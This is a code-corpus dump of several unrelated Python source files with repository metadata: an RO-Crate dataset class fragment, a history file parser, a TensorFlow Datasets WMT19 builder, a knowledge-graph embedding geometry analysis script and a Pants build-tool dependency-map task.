self.root_dataset.datePublished = value
@property
def creator(self):
return self.root_dataset['creator']
@creator.setter
def creator(self, value):
self.root_dataset['creator'] = value
@property
def license(self):
return self.root_dataset['license']
@license.setter
def license(self, value):
self.root_dataset['license'] = value
@property
def description(self):
return self.root_dataset['description']
@description.setter
def description(self, value):
self.root_dataset['description'] = value
@property
def keywords(self):
return self.root_dataset['keywords']
@keywords.setter
def keywords(self, value):
self.root_dataset['keywords'] = value
@property
def publisher(self):
return self.root_dataset['publisher']
@publisher.setter
def publisher(self, value):
self.root_dataset['publisher'] = value
@property
def isBasedOn(self):
return self.root_dataset['isBasedOn']
@isBasedOn.setter
def isBasedOn(self, value):
self.root_dataset['isBasedOn'] = value
@property
def image(self):
return self.root_dataset['image']
@image.setter
def image(self, value):
self.root_dataset['image'] = value
@property
def CreativeWorkStatus(self):
return self.root_dataset['CreativeWorkStatus']
@CreativeWorkStatus.setter
def CreativeWorkStatus(self, value):
self.root_dataset['CreativeWorkStatus'] = value
@property
def test_dir(self):
rval = self.dereference("test")
if rval and "Dataset" in rval.type:
return rval
return None
@property
def examples_dir(self):
rval = self.dereference("examples")
if rval and "Dataset" in rval.type:
return rval
return None
@property
def test_metadata_path(self):
if self.test_dir is None:
return None
return Path(self.test_dir.filepath()) / TEST_METADATA_BASENAME
def resolve_id(self, relative_id):
return generate.arcp_random(relative_id.strip('./'), uuid=self.uuid)
def get_entities(self):
return (self.default_entities + self.data_entities +
self.contextual_entities)
def set_main_entity(self, main_entity):
self.root_dataset['mainEntity'] = main_entity
def _get_root_jsonld(self):
self.root_dataset.properties()
def dereference(self, entity_id):
canonical_id = self.resolve_id(entity_id)
for entity in self.get_entities():
if canonical_id == entity.canonical_id():
return entity
return None
def add_file(self, source, crate_path=None, fetch_remote=False,
properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
file_entity = File(self, source=source, dest_path=crate_path, fetch_remote=fetch_remote, properties=props)
self._add_data_entity(file_entity)
return file_entity
def remove_file(self, file_id):
self._remove_data_entity(file_id)
def add_directory(self, source, crate_path=None, properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
dataset_entity = Dataset(self, source, crate_path, properties)
self._add_data_entity(dataset_entity)
return dataset_entity
def remove_directory(self, dir_id):
self._remove_data_entity(dir_id)
def _add_data_entity(self, data_entity):
self._remove_data_entity(data_entity)
self.data_entities.append(data_entity)
def _remove_data_entity(self, data_entity):
if data_entity in self.data_entities:
self.data_entities.remove(data_entity)
wZip64=True
)
for writable_entity in self.data_entities + self.default_entities:
writable_entity.write_zip(zf)
zf.close()
return zf.filename
| true
| true
|
f718fbc2d26d5ffb3491afb7372ff14d83ab4105
| 2,368
|
py
|
Python
|
src/erdbeermet/tools/FileIO.py
|
bnittka/Erdbeermet
|
43c73d4cf3a918090320c7519a9ea09014f46744
|
[
"MIT"
] | 5
|
2021-12-02T14:53:02.000Z
|
2022-01-03T08:24:16.000Z
|
src/erdbeermet/tools/FileIO.py
|
bnittka/Erdbeermet
|
43c73d4cf3a918090320c7519a9ea09014f46744
|
[
"MIT"
] | 1
|
2022-01-10T09:07:44.000Z
|
2022-01-10T10:20:07.000Z
|
src/erdbeermet/tools/FileIO.py
|
bnittka/Erdbeermet
|
43c73d4cf3a918090320c7519a9ea09014f46744
|
[
"MIT"
] | 7
|
2021-12-13T14:56:33.000Z
|
2022-01-18T17:47:38.000Z
|
# -*- coding: utf-8 -*-
import re
def write_history(filename, history):
with open(filename, 'w') as f:
start = True
for x, y, z, alpha, delta in history:
delta_str = '[' + ','.join(str(d) for d in delta) + ']'
if start:
f.write(f"({x}, {y}: {z}) {alpha}; {delta_str}")
start = False
else:
f.write(f"\n({x}, {y}: {z}) {alpha}; {delta_str}")
def _split_floats(floats):
return [float(item) for item in floats.split(',')]
def parse_history(filename):
event_regex = re.compile(r"\((\d+)\,\s*(\d+)\:\s*(\d+)\)\;?\s*(\d+\.?\d*e?-?\d+)\;\s*\[(?P<delta>(\s*\d+\.?\d*e?-?\d+,?)+)\]")
with open(filename, 'r') as f:
lines = f.readlines()
history = []
for line in lines:
match = event_regex.match(line.strip())
if match:
x = int(match.group(1))
y = int(match.group(2))
z = int(match.group(3))
alpha = float(match.group(4))
delta = _split_floats(match.group('delta'))
history.append((x, y, z, alpha, delta))
return history
def _write_matrix(f, V, D):
for i in range(len(V)):
f.write(f'\n{V[i]} ')
for j in range(len(V)):
f.write('{: 12.8f}'.format(D[i,j]))
def write_recognition(filename, tree, matrices=True):
with open(filename, 'w') as f:
start = True
for v in tree.preorder():
if not start:
f.write('\n')
f.write(80 * '-')
f.write('\n')
else:
start = False
f.write(f'n={v.n}\n')
if v.R_step is not None:
f.write('(result of R-step: ({},{}:{}){:.8f})\n'.format(*v.R_step))
f.write(f'V={v.V}\n')
f.write(f'total successes of this branch: {v.valid_ways}\n')
if matrices and v.D is not None:
f.write(f'Matrix on {v.n} elements:\n')
_write_matrix(f, v.V, v.D)
f.write('\n')
if not v.valid_ways:
f.write(f'reason of abort: {v.info}\n')
| 26.909091
| 130
| 0.425676
|
import re
def write_history(filename, history):
with open(filename, 'w') as f:
start = True
for x, y, z, alpha, delta in history:
delta_str = '[' + ','.join(str(d) for d in delta) + ']'
if start:
f.write(f"({x}, {y}: {z}) {alpha}; {delta_str}")
start = False
else:
f.write(f"\n({x}, {y}: {z}) {alpha}; {delta_str}")
def _split_floats(floats):
return [float(item) for item in floats.split(',')]
def parse_history(filename):
event_regex = re.compile(r"\((\d+)\,\s*(\d+)\:\s*(\d+)\)\;?\s*(\d+\.?\d*e?-?\d+)\;\s*\[(?P<delta>(\s*\d+\.?\d*e?-?\d+,?)+)\]")
with open(filename, 'r') as f:
lines = f.readlines()
history = []
for line in lines:
match = event_regex.match(line.strip())
if match:
x = int(match.group(1))
y = int(match.group(2))
z = int(match.group(3))
alpha = float(match.group(4))
delta = _split_floats(match.group('delta'))
history.append((x, y, z, alpha, delta))
return history
def _write_matrix(f, V, D):
for i in range(len(V)):
f.write(f'\n{V[i]} ')
for j in range(len(V)):
f.write('{: 12.8f}'.format(D[i,j]))
def write_recognition(filename, tree, matrices=True):
with open(filename, 'w') as f:
start = True
for v in tree.preorder():
if not start:
f.write('\n')
f.write(80 * '-')
f.write('\n')
else:
start = False
f.write(f'n={v.n}\n')
if v.R_step is not None:
f.write('(result of R-step: ({},{}:{}){:.8f})\n'.format(*v.R_step))
f.write(f'V={v.V}\n')
f.write(f'total successes of this branch: {v.valid_ways}\n')
if matrices and v.D is not None:
f.write(f'Matrix on {v.n} elements:\n')
_write_matrix(f, v.V, v.D)
f.write('\n')
if not v.valid_ways:
f.write(f'reason of abort: {v.info}\n')
| true
| true
|
f718fd3a703f958aab1607b729f55dd3d248123d
| 2,222
|
py
|
Python
|
tensorflow_datasets/translate/wmt19.py
|
leenamaheshnikam10/datasets
|
762cc556c364ecbb930b825709aa81647d889300
|
[
"Apache-2.0"
] | 2
|
2019-10-20T05:40:10.000Z
|
2019-10-31T17:25:52.000Z
|
tensorflow_datasets/translate/wmt19.py
|
thanhkaist/datasets
|
02da35c558ec8ea704e744a2008c5cecb2e7a0a1
|
[
"Apache-2.0"
] | 1
|
2019-04-09T07:50:49.000Z
|
2019-04-09T07:51:10.000Z
|
tensorflow_datasets/translate/wmt19.py
|
thanhkaist/datasets
|
02da35c558ec8ea704e744a2008c5cecb2e7a0a1
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2019 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""WMT19: Translate dataset."""
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.translate import wmt
_URL = "http://www.statmt.org/wmt19/translation-task.html"
# TODO(adarob): Update with citation of overview paper once it is published.
_CITATION = """
@ONLINE {wmt19translate,
author = "Wikimedia Foundation",
title = "ACL 2019 Fourth Conference on Machine Translation (WMT19), Shared Task: Machine Translation of News",
url = "http://www.statmt.org/wmt19/translation-task.html"
}
"""
_LANGUAGE_PAIRS = [
(lang, "en") for lang in ["cs", "de", "fi", "gu", "kk", "lt", "ru", "zh"]
] + [("fr", "de")]
class Wmt19Translate(wmt.WmtTranslate):
"""WMT 19 translation datasets for {(xx, "en")} + ("fr", "de") pairs."""
BUILDER_CONFIGS = [
wmt.WmtConfig( # pylint:disable=g-complex-comprehension
description="WMT 2019 %s-%s translation task dataset." % (l1, l2),
url=_URL,
citation=_CITATION,
language_pair=(l1, l2),
version="0.0.3")
for l1, l2 in _LANGUAGE_PAIRS
]
@property
def _subsets(self):
return {
tfds.Split.TRAIN: [
"europarl_v9", "europarl_v7_frde", "paracrawl_v3",
"paracrawl_v1_ru", "paracrawl_v3_frde", "commoncrawl",
"commoncrawl_frde", "newscommentary_v14", "newscommentary_v14_frde",
"czeng_17", "yandexcorpus", "wikititles_v1", "uncorpus_v1",
"rapid_2016_ltfi", "rapid_2019"] + wmt.CWMT_SUBSET_NAMES,
tfds.Split.VALIDATION: [
"euelections_dev2019", "newsdev2019", "newstest2018"]
}
| 36.42623
| 115
| 0.673267
|
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.translate import wmt
_URL = "http://www.statmt.org/wmt19/translation-task.html"
_CITATION = """
@ONLINE {wmt19translate,
author = "Wikimedia Foundation",
title = "ACL 2019 Fourth Conference on Machine Translation (WMT19), Shared Task: Machine Translation of News",
url = "http://www.statmt.org/wmt19/translation-task.html"
}
"""
_LANGUAGE_PAIRS = [
(lang, "en") for lang in ["cs", "de", "fi", "gu", "kk", "lt", "ru", "zh"]
] + [("fr", "de")]
class Wmt19Translate(wmt.WmtTranslate):
BUILDER_CONFIGS = [
wmt.WmtConfig(
description="WMT 2019 %s-%s translation task dataset." % (l1, l2),
url=_URL,
citation=_CITATION,
language_pair=(l1, l2),
version="0.0.3")
for l1, l2 in _LANGUAGE_PAIRS
]
@property
def _subsets(self):
return {
tfds.Split.TRAIN: [
"europarl_v9", "europarl_v7_frde", "paracrawl_v3",
"paracrawl_v1_ru", "paracrawl_v3_frde", "commoncrawl",
"commoncrawl_frde", "newscommentary_v14", "newscommentary_v14_frde",
"czeng_17", "yandexcorpus", "wikititles_v1", "uncorpus_v1",
"rapid_2016_ltfi", "rapid_2019"] + wmt.CWMT_SUBSET_NAMES,
tfds.Split.VALIDATION: [
"euelections_dev2019", "newsdev2019", "newstest2018"]
}
| true
| true
|
f718fd47d1d672bb8ec94a96424517579c5f1682
| 7,525
|
py
|
Python
|
perfAnalysis.py
|
malllabiisc/kg-geometry
|
d5b40d6795085109da5438cdc1d83d32fd5fc373
|
[
"Apache-2.0"
] | 18
|
2018-07-31T06:33:45.000Z
|
2021-07-22T11:27:40.000Z
|
perfAnalysis.py
|
malllabiisc/kg-geometry
|
d5b40d6795085109da5438cdc1d83d32fd5fc373
|
[
"Apache-2.0"
] | 3
|
2018-07-30T02:48:06.000Z
|
2021-05-03T07:17:48.000Z
|
perfAnalysis.py
|
malllabiisc/kg-geometry
|
d5b40d6795085109da5438cdc1d83d32fd5fc373
|
[
"Apache-2.0"
] | 2
|
2018-07-01T08:53:06.000Z
|
2018-12-12T05:15:40.000Z
|
import sys
import os
import argparse
import cPickle as pickle
from ConfigParser import ConfigParser as ConfigParser
from itertools import product
import numpy as np
from sklearn.decomposition import PCA
from matplotlib import pyplot as plt
from matplotlib.legend_handler import HandlerLine2D
from sklearn.manifold import TSNE
import scipy.stats as scistats
from stats import Stats
from model import Model
from triples import Triples
from util import *
from analysis import Analyser
from typeAnalysis import best_methods, uniform_methods
def getParser():
parser = argparse.ArgumentParser(description="parser for arguments", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-m", "--mdir", type=str, help="directory containing the models", default="./data")
parser.add_argument("-d", "--dataname", type=str, help="dataset name", default="fb15k")
parser.add_argument("-t", "--type", type=str, help="vector type [ent/rel]", default="ent")
parser.add_argument("-g", "--geometry", type=str, help="geometry feature[length/conicity]", required=True)
parser.add_argument("-p", "--perffile", type=str, help="files containing model performances", required=True)
parser.add_argument("-o", "--opdir", type=str, help="output directory", required=True)
parser.add_argument("--result", dest="result", help="true for plotting existing results", action="store_true")
parser.set_defaults(result=False)
#parser.add_argument("-d", "--datafile", type=str, help="pickled triples file", required=True)
#parser.add_argument("-m", "--modelfile", type=str, help="pickled model file", required=True)
#parser.add_argument("-c", "--cfgfile", type=str, help="config file containing list of model and data files", default="./exp.cfg")
#parser.add_argument("--pr", dest="pr", help="Flag for using pagerank plot", action='store_true')
#parser.set_defaults(pr=False)
return parser
def readPerfs(filename):
perfs = {}
delimiter = "\t"
with open(filename, "r") as fin:
for line in fin:
line = line.strip()
if line:
x = line.split(delimiter)
dim = int(x[1])
nneg = int(x[2])
method = x[0].lower()
hits_10 = np.float32(x[5])
if hits_10 < 1:
hits_10 = 100*hits_10
perf = {"mr":np.float32(x[3]), "mrr":np.float32(x[4]), "hits_10":hits_10}
perfs.setdefault(dim, {}).setdefault(nneg, {})[method] = perf
return perfs
def perfAnalysis(args):
#self.cfg = ConfigParser()
#self.cfg.read(args.cfgFile)
methods = ['transe', 'transr', 'stranse', 'distmult', 'hole', 'complex']
nnegs = [1, 50, 100]
dims = [50, 100]
mean_products = {}
name_conicity = {}
useEnt = True
if not args.result:
for dim in dims:
for nneg in nnegs:
for method in methods:
modelfile = "%s.%s.n%d.d%d.p" %(args.dataname, method, nneg, dim)
modelfile = os.path.join(args.mdir, modelfile)
datafile = "%s.%s.bin" % (args.dataname, method)
datafile = os.path.join(args.mdir, datafile)
analyser = Analyser(datafile, modelfile, usePR=False)
#nSamples = 100
#eRanges = [((0,100), nSamples), ((100,500), nSamples), ((500,5000), nSamples), ((5000, analyser.t.ne), nSamples)]
#entIndices = analyser.getEntIdxs(eRanges)
if args.type in ['ent']:
nSamples = 100
ranges = [((0,100), nSamples), ((100,500), nSamples), ((500,5000), nSamples), ((5000, analyser.t.ne), nSamples)]
indices = analyser.getEntIdxs(ranges)
useEnt = True
else:
nSamples = 100
if args.dataname in ['wn18']:
ranges = [((0,3), 3), ((3,10), 7), ((10,analyser.t.nr), analyser.t.nr-10)]
else:
ranges = [((0,100), nSamples), ((100,500), nSamples), ((500,analyser.t.nr), nSamples)]
indices = analyser.getRelIdxs(ranges)
useEnt = False
legendLabels=[]
for a,b in ranges:
curLabel = "%d-%d"%(a[0],a[1])
legendLabels.append(curLabel)
if args.geometry in ['length']:
gp, mgp = analyser.getLengths(indices, ent=useEnt)
else:
gp, mgp = analyser.getInnerProducts(indices, sampleMean=True, ent=useEnt, normalized=True)
print "%s\tneg %d" % (method,nneg)
print mgp
mean_products.setdefault(dim, {}).setdefault(nneg, {})[method] = np.array(mgp, dtype=np.float32)
mname = "%s.%s.n%d.d%d" % (args.dataname, method, nneg, dim)
name_conicity[mname] = mgp[-1]
outputfile = os.path.join(args.opdir, args.geometry, "%s.%s"%(args.type, args.dataname))
with open(outputfile+".p", "wb") as fout:
pickle.dump({"mean_products":mean_products, "methods":methods, "nnegs":nnegs, "dims":dims, "name_conicity":name_conicity}, fout)
#pickle.dump({"mean_products":mean_products, "mean_products_list":mean_products_list, "methods":methods, "nnegs":nnegs, "dim":dim}, fout)
else:
outputfile = os.path.join(args.opdir, args.geometry, "%s.%s"%(args.type, args.dataname))
with open(outputfile+".p", "rb") as fin:
result = pickle.load(fin)
if "perfs" not in result:
with open(args.perffile, "rb") as fin:
"""
mean_products = pickle.load(fin)
mean_products_list = []
for nneg in nnegs:
cur_products_list = []
for method in methods:
cur_products_list.append(np.float32(mean_products[nneg][method][-1]))
mean_products_list.append(cur_products_list)
"""
result['perfs'] = pickle.load(fin)
#perfs = readPerfs(args.perffile)
whitelist = []
for method, nneg, dim in product(result['methods'], result['nnegs'], result['dims']):
if dim == 100:
if method in ['hole', 'complex', 'distmult']:
whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
elif method in ['transe', 'stranse'] and nneg in [1]:
whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
elif method in ['transr']:
if nneg == 1:
whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
elif dim == 100:
whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
if args.geometry in ['length']:
plotConePerf(methods, nnegs, dims, result, outputfile, xlabel="length", whitelist=whitelist, show=True)
else:
plotConePerf(methods, nnegs, dims, result, outputfile, xlabel="conicity", whitelist=whitelist, show=True)
def main():
parser = getParser()
try:
args = parser.parse_args()
except:
parser.print_help()
sys.exit(1)
perfAnalysis(args)
if __name__ == "__main__":
main()
| 48.548387
| 149
| 0.561063
|
import sys
import os
import argparse
import cPickle as pickle
from ConfigParser import ConfigParser as ConfigParser
from itertools import product
import numpy as np
from sklearn.decomposition import PCA
from matplotlib import pyplot as plt
from matplotlib.legend_handler import HandlerLine2D
from sklearn.manifold import TSNE
import scipy.stats as scistats
from stats import Stats
from model import Model
from triples import Triples
from util import *
from analysis import Analyser
from typeAnalysis import best_methods, uniform_methods
def getParser():
parser = argparse.ArgumentParser(description="parser for arguments", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-m", "--mdir", type=str, help="directory containing the models", default="./data")
parser.add_argument("-d", "--dataname", type=str, help="dataset name", default="fb15k")
parser.add_argument("-t", "--type", type=str, help="vector type [ent/rel]", default="ent")
parser.add_argument("-g", "--geometry", type=str, help="geometry feature[length/conicity]", required=True)
parser.add_argument("-p", "--perffile", type=str, help="files containing model performances", required=True)
parser.add_argument("-o", "--opdir", type=str, help="output directory", required=True)
parser.add_argument("--result", dest="result", help="true for plotting existing results", action="store_true")
parser.set_defaults(result=False)
return parser
def readPerfs(filename):
perfs = {}
delimiter = "\t"
with open(filename, "r") as fin:
for line in fin:
line = line.strip()
if line:
x = line.split(delimiter)
dim = int(x[1])
nneg = int(x[2])
method = x[0].lower()
hits_10 = np.float32(x[5])
if hits_10 < 1:
hits_10 = 100*hits_10
perf = {"mr":np.float32(x[3]), "mrr":np.float32(x[4]), "hits_10":hits_10}
perfs.setdefault(dim, {}).setdefault(nneg, {})[method] = perf
return perfs
def perfAnalysis(args):
methods = ['transe', 'transr', 'stranse', 'distmult', 'hole', 'complex']
nnegs = [1, 50, 100]
dims = [50, 100]
mean_products = {}
name_conicity = {}
useEnt = True
if not args.result:
for dim in dims:
for nneg in nnegs:
for method in methods:
modelfile = "%s.%s.n%d.d%d.p" %(args.dataname, method, nneg, dim)
modelfile = os.path.join(args.mdir, modelfile)
datafile = "%s.%s.bin" % (args.dataname, method)
datafile = os.path.join(args.mdir, datafile)
analyser = Analyser(datafile, modelfile, usePR=False)
if args.type in ['ent']:
nSamples = 100
ranges = [((0,100), nSamples), ((100,500), nSamples), ((500,5000), nSamples), ((5000, analyser.t.ne), nSamples)]
indices = analyser.getEntIdxs(ranges)
useEnt = True
else:
nSamples = 100
if args.dataname in ['wn18']:
ranges = [((0,3), 3), ((3,10), 7), ((10,analyser.t.nr), analyser.t.nr-10)]
else:
ranges = [((0,100), nSamples), ((100,500), nSamples), ((500,analyser.t.nr), nSamples)]
indices = analyser.getRelIdxs(ranges)
useEnt = False
legendLabels=[]
for a,b in ranges:
curLabel = "%d-%d"%(a[0],a[1])
legendLabels.append(curLabel)
if args.geometry in ['length']:
gp, mgp = analyser.getLengths(indices, ent=useEnt)
else:
gp, mgp = analyser.getInnerProducts(indices, sampleMean=True, ent=useEnt, normalized=True)
print "%s\tneg %d" % (method,nneg)
print mgp
mean_products.setdefault(dim, {}).setdefault(nneg, {})[method] = np.array(mgp, dtype=np.float32)
mname = "%s.%s.n%d.d%d" % (args.dataname, method, nneg, dim)
name_conicity[mname] = mgp[-1]
outputfile = os.path.join(args.opdir, args.geometry, "%s.%s"%(args.type, args.dataname))
with open(outputfile+".p", "wb") as fout:
pickle.dump({"mean_products":mean_products, "methods":methods, "nnegs":nnegs, "dims":dims, "name_conicity":name_conicity}, fout)
else:
outputfile = os.path.join(args.opdir, args.geometry, "%s.%s"%(args.type, args.dataname))
with open(outputfile+".p", "rb") as fin:
result = pickle.load(fin)
if "perfs" not in result:
with open(args.perffile, "rb") as fin:
"""
mean_products = pickle.load(fin)
mean_products_list = []
for nneg in nnegs:
cur_products_list = []
for method in methods:
cur_products_list.append(np.float32(mean_products[nneg][method][-1]))
mean_products_list.append(cur_products_list)
"""
result['perfs'] = pickle.load(fin)
whitelist = []
for method, nneg, dim in product(result['methods'], result['nnegs'], result['dims']):
if dim == 100:
if method in ['hole', 'complex', 'distmult']:
whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
elif method in ['transe', 'stranse'] and nneg in [1]:
whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
elif method in ['transr']:
if nneg == 1:
whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
elif dim == 100:
whitelist.append("%s.n%d.d%d"%(method, nneg, dim))
if args.geometry in ['length']:
plotConePerf(methods, nnegs, dims, result, outputfile, xlabel="length", whitelist=whitelist, show=True)
else:
plotConePerf(methods, nnegs, dims, result, outputfile, xlabel="conicity", whitelist=whitelist, show=True)
def main():
parser = getParser()
try:
args = parser.parse_args()
except:
parser.print_help()
sys.exit(1)
perfAnalysis(args)
if __name__ == "__main__":
main()
| false
| true
|
f71900153bd1b94d6b9815bcc58db5cfd55c8cd4
| 8,530
|
py
|
Python
|
src/python/twitter/pants/tasks/depmap.py
|
wfarner/commons
|
42988a7a49f012665174538cca53604c7846ee86
|
[
"Apache-2.0"
] | 1
|
2019-12-20T14:13:27.000Z
|
2019-12-20T14:13:27.000Z
|
src/python/twitter/pants/tasks/depmap.py
|
wfarner/commons
|
42988a7a49f012665174538cca53604c7846ee86
|
[
"Apache-2.0"
] | null | null | null |
src/python/twitter/pants/tasks/depmap.py
|
wfarner/commons
|
42988a7a49f012665174538cca53604c7846ee86
|
[
"Apache-2.0"
] | 1
|
2019-12-20T14:13:29.000Z
|
2019-12-20T14:13:29.000Z
|
# ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
from __future__ import print_function
from twitter.pants.tasks.console_task import ConsoleTask
from twitter.pants.tasks import TaskError
from twitter.pants import is_jvm, is_jvm_app, is_python, is_concrete
from twitter.pants.targets.jar_dependency import JarDependency
class Depmap(ConsoleTask):
"""Generates either a textual dependency tree or a graphviz digraph dot file for the dependency
set of a target.
"""
@staticmethod
def _is_jvm(dep):
return is_jvm(dep) or is_jvm_app(dep)
@classmethod
def setup_parser(cls, option_group, args, mkflags):
super(Depmap, cls).setup_parser(option_group, args, mkflags)
cls.internal_only_flag = mkflags("internal-only")
cls.external_only_flag = mkflags("external-only")
option_group.add_option(cls.internal_only_flag,
action="store_true",
dest="depmap_is_internal_only",
default=False,
help='Specifies that only internal dependencies should'
' be included in the graph output (no external jars).')
option_group.add_option(cls.external_only_flag,
action="store_true",
dest="depmap_is_external_only",
default=False,
help='Specifies that only external dependencies should'
' be included in the graph output (only external jars).')
option_group.add_option(mkflags("minimal"),
action="store_true",
dest="depmap_is_minimal",
default=False,
help='For a textual dependency tree, only prints a dependency the 1st'
' time it is encountered. For graph output this does nothing.')
option_group.add_option(mkflags("separator"),
dest="depmap_separator",
default="-",
help='Specifies the separator to use between the org/name/rev'
' components of a dependency\'s fully qualified name.')
option_group.add_option(mkflags("graph"),
action="store_true",
dest="depmap_is_graph",
default=False,
help='Specifies the internal dependency graph should be'
' output in the dot digraph format')
def __init__(self, context):
ConsoleTask.__init__(self, context)
if (self.context.options.depmap_is_internal_only
and self.context.options.depmap_is_external_only):
cls = self.__class__
error_str = "At most one of %s or %s can be selected." % (cls.internal_only_flag,
cls.external_only_flag)
raise TaskError(error_str)
self.is_internal_only = self.context.options.depmap_is_internal_only
self.is_external_only = self.context.options.depmap_is_external_only
self.is_minimal = self.context.options.depmap_is_minimal
self.is_graph = self.context.options.depmap_is_graph
self.separator = self.context.options.depmap_separator
def console_output(self, targets):
if len(self.context.target_roots) == 0:
raise TaskError("One or more target addresses are required.")
for target in self.context.target_roots:
if all(self._is_jvm(t) for t in target.resolve() if is_concrete(t)):
if self.is_graph:
return self._output_digraph(target)
else:
return self._output_dependency_tree(target)
elif is_python(target):
raise TaskError('Unsupported for Python targets')
else:
raise TaskError('Unsupported for target %s' % target)
def _dep_id(self, dependency):
"""Returns a tuple of dependency_id , is_internal_dep."""
params = dict(sep=self.separator)
if isinstance(dependency, JarDependency):
params.update(org=dependency.org, name=dependency.name, rev=dependency.rev)
else:
params.update(org='internal', name=dependency.id)
if params.get('rev'):
return "%(org)s%(sep)s%(name)s%(sep)s%(rev)s" % params, False
else:
return "%(org)s%(sep)s%(name)s" % params, True
def _output_dependency_tree(self, target):
def output_dep(dep, indent):
return "%s%s" % (indent * " ", dep)
def output_deps(dep, indent=0, outputted=set()):
dep_id, _ = self._dep_id(dep)
if dep_id in outputted:
return [output_dep("*%s" % dep_id, indent)] if not self.is_minimal else []
else:
output = []
if not self.is_external_only:
output += [output_dep(dep_id, indent)]
outputted.add(dep_id)
indent += 1
if self._is_jvm(dep):
for internal_dep in dep.internal_dependencies:
output += output_deps(internal_dep, indent, outputted)
if not self.is_internal_only:
if self._is_jvm(dep):
for jar_dep in dep.jar_dependencies:
jar_dep_id, internal = self._dep_id(jar_dep)
if not internal:
if jar_dep_id not in outputted or (not self.is_minimal
and not self.is_external_only):
output += [output_dep(jar_dep_id, indent)]
outputted.add(jar_dep_id)
return output
return [dependency for t in target.resolve() for dependency in output_deps(t)]
def _output_digraph(self, target):
def output_candidate(internal):
return ((self.is_internal_only and internal)
or (self.is_external_only and not internal)
or (not self.is_internal_only and not self.is_external_only))
def output_dep(dep):
dep_id, internal = self._dep_id(dep)
science_styled = internal and not self.is_internal_only
twitter_styled = not internal and dep.org.startswith('com.twitter')
if science_styled:
fmt = ' "%(id)s" [label="%(id)s", style="filled", fillcolor="#0084b4", fontcolor="white"];'
return fmt % {'id': dep_id}
elif twitter_styled:
return ' "%s" [style="filled", fillcolor="#c0deed"];' % dep_id
else:
return ' "%s";' % dep_id
def output_deps(outputted, dep):
output = []
if dep not in outputted:
outputted.add(dep)
for dependency in dep.resolve():
if self._is_jvm(dependency):
for internal_dependency in dependency.internal_dependencies:
output += output_deps(outputted, internal_dependency)
for jar in (dependency.jar_dependencies if self._is_jvm(dependency) else [dependency]):
jar_id, internal = self._dep_id(jar)
if output_candidate(internal):
if jar not in outputted:
output += [output_dep(jar)]
outputted.add(jar)
target_id, _ = self._dep_id(target)
dep_id, _ = self._dep_id(dependency)
left_id = target_id if self.is_external_only else dep_id
if (left_id, jar_id) not in outputted:
styled = internal and not self.is_internal_only
output += [' "%s" -> "%s"%s;' % (left_id, jar_id,
' [style="dashed"]' if styled else '')]
outputted.add((left_id, jar_id))
return output
return ['digraph "%s" {' % target.id, output_dep(target)] + output_deps(set(), target) + ['}']
| 43.520408
| 100
| 0.59027
|
from __future__ import print_function
from twitter.pants.tasks.console_task import ConsoleTask
from twitter.pants.tasks import TaskError
from twitter.pants import is_jvm, is_jvm_app, is_python, is_concrete
from twitter.pants.targets.jar_dependency import JarDependency
class Depmap(ConsoleTask):
@staticmethod
def _is_jvm(dep):
return is_jvm(dep) or is_jvm_app(dep)
@classmethod
def setup_parser(cls, option_group, args, mkflags):
super(Depmap, cls).setup_parser(option_group, args, mkflags)
cls.internal_only_flag = mkflags("internal-only")
cls.external_only_flag = mkflags("external-only")
option_group.add_option(cls.internal_only_flag,
action="store_true",
dest="depmap_is_internal_only",
default=False,
help='Specifies that only internal dependencies should'
' be included in the graph output (no external jars).')
option_group.add_option(cls.external_only_flag,
action="store_true",
dest="depmap_is_external_only",
default=False,
help='Specifies that only external dependencies should'
' be included in the graph output (only external jars).')
option_group.add_option(mkflags("minimal"),
action="store_true",
dest="depmap_is_minimal",
default=False,
help='For a textual dependency tree, only prints a dependency the 1st'
' time it is encountered. For graph output this does nothing.')
option_group.add_option(mkflags("separator"),
dest="depmap_separator",
default="-",
help='Specifies the separator to use between the org/name/rev'
' components of a dependency\'s fully qualified name.')
option_group.add_option(mkflags("graph"),
action="store_true",
dest="depmap_is_graph",
default=False,
help='Specifies the internal dependency graph should be'
' output in the dot digraph format')
def __init__(self, context):
ConsoleTask.__init__(self, context)
if (self.context.options.depmap_is_internal_only
and self.context.options.depmap_is_external_only):
cls = self.__class__
error_str = "At most one of %s or %s can be selected." % (cls.internal_only_flag,
cls.external_only_flag)
raise TaskError(error_str)
self.is_internal_only = self.context.options.depmap_is_internal_only
self.is_external_only = self.context.options.depmap_is_external_only
self.is_minimal = self.context.options.depmap_is_minimal
self.is_graph = self.context.options.depmap_is_graph
self.separator = self.context.options.depmap_separator
def console_output(self, targets):
if len(self.context.target_roots) == 0:
raise TaskError("One or more target addresses are required.")
for target in self.context.target_roots:
if all(self._is_jvm(t) for t in target.resolve() if is_concrete(t)):
if self.is_graph:
return self._output_digraph(target)
else:
return self._output_dependency_tree(target)
elif is_python(target):
raise TaskError('Unsupported for Python targets')
else:
raise TaskError('Unsupported for target %s' % target)
